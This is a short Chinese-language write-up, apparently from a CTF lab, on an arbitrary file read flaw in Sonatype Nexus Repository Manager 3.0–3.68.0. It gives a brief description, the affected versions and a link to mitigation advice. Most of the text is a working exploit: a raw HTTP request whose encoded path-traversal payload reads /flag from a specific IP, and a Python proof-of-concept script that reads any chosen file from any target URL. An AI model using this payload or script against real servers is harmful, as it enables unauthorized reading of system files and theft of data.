nexus3任意文件读取 漏洞简介: Nexus Repository Manager 是一个存储库管理器,用于组织、存储和分发开发所需的工件。
漏洞原理: 攻击者可以制作一个 URL 来返回任何文件作为下载,包括 Sonatype Nexus Repository 3 应用程序范围之外的系统文件。
漏洞利用前提: 攻击者必须具有 Sonatype Nexus Repository 3 实例的网络访问权限。
漏洞利用版本 该漏洞影响 Sonatype Nexus Repository Manager 3.0 至 3.68.0 版本。
防御措施 升级 Nexus Repository 是消除此漏洞的推荐方法。但是,对于无法立即升级的部署,可以使用即时缓解选项:https://support.sonatype.com/hc/en-us/articles/29412417068819 
修复建议: l 定期更新系统补丁,减少系统漏洞,提升服务器的安全性。
1 2 3 4 5 6 7 8 GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../flag HTTP/1.1 Host: 8.147.132.32:25912 Cookie: NX-ANTI-CSRF-TOKEN=0.06856643752905667; apt.uid=AP-YFGMCGUNNIFB-2-1752740457278-79341969.0.2.6b933aba-006b-4c12-b4b5-a0ddc2adfcf4; apt.sid=AP-YFGMCGUNNIFB-2-1752740457277-69755973 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 Accept: */* Referer: http://8.147.132.32:25912/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 import requests url = input("请输入目标url:") file = input("请输入需要读取的文件路径:") def poc(url,file):     url = url + "//%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f.." + file     headers1 = {         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"     }     response = requests.get(url,headers=headers1)     if response.status_code == 200:         print("漏洞利用成功")         print(response.text)     else:         print("利用失败") if __name__ == "__main__":     poc(url,file)